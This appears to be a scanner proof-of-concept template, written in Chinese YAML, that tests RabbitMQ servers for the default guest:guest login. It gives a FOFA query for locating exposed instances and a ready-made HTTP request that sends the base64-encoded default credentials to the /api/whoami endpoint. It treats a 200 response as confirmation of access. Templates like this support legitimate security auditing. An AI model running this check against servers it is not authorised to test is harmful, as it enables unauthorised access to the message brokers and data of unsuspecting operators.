product: RabbitMQ
vName: RabbitMQ 默认口令
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: RabbitMQ 默认口令为 guest:guest
version: ''
note: ''
search:
  FOFA: app="RabbitMQ"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/whoami
      header:
        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
        Cookie: m=2258:Z3Vlc3Q6Z3Vlc3Q%253D
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - name
            logic: and